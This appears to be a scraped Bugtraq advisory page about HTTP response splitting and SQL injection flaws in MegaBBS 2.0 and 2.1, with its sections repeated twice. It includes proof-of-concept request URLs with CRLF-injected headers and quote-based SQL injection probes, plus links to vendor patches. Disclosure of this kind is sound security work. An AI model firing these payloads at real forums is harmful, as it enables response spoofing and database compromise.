PD9 Software MegaBBS Multiple Vulnerabilities
BID:11253
Info
PD9 Software MegaBBS Multiple Vulnerabilities
| Bugtraq ID: | 11253 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 27 2004 12:00AM |
| Updated: | Sep 27 2004 12:00AM |
| Credit: | Discovery is credited to pigrelax <[email protected]>. |
| Vulnerable: |
PD9 Software MegaBBS 2.1 PD9 Software MegaBBS 2.0 |
| Not Vulnerable: | |
Discussion
PD9 Software MegaBBS Multiple Vulnerabilities
MegaBBS is reported prone to multiple vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out HTTP response splitting and SQL injection attacks.
MegaBBS versions 2.0 and 2.1 are reported prone to these issues.
MegaBBS is reported prone to multiple vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out HTTP response splitting and SQL injection attacks.
MegaBBS versions 2.0 and 2.1 are reported prone to these issues.
Exploit / POC
PD9 Software MegaBBS Multiple Vulnerabilities
No exploit is required.
The following proof of concept examples are available:
http://www.example.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
http://www.example.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC
ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
%0d%0a&action=writenew&displaytype=flat
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'
No exploit is required.
The following proof of concept examples are available:
http://www.example.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
http://www.example.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC
ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
%0d%0a&action=writenew&displaytype=flat
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'
Solution / Fix
PD9 Software MegaBBS Multiple Vulnerabilities
Solution:
The vendor has released patches to address these issue. Users are encouraged to download new versions of userlevelmembers-edit.asp and edit-groups.asp files.
PD9 Software MegaBBS 2.0
PD9 Software MegaBBS 2.1
Solution:
The vendor has released patches to address these issue. Users are encouraged to download new versions of userlevelmembers-edit.asp and edit-groups.asp files.
PD9 Software MegaBBS 2.0
-
PD9 Software edit-groups.asp
http://www.pd9soft.com/megabbs/forums/get-attachment.asp?attachmentid= 1173 -
PD9 Software userlevelmembers-edit.asp
http://www.pd9soft.com/megabbs/forums/get-attachment.asp?attachmentid= 1171
PD9 Software MegaBBS 2.1
-
PD9 Software edit-groups.asp
http://www.pd9soft.com/megabbs/forums/get-attachment.asp?attachmentid= 1173 -
PD9 Software userlevelmembers-edit.asp
http://www.pd9soft.com/megabbs/forums/get-attachment.asp?attachmentid= 1171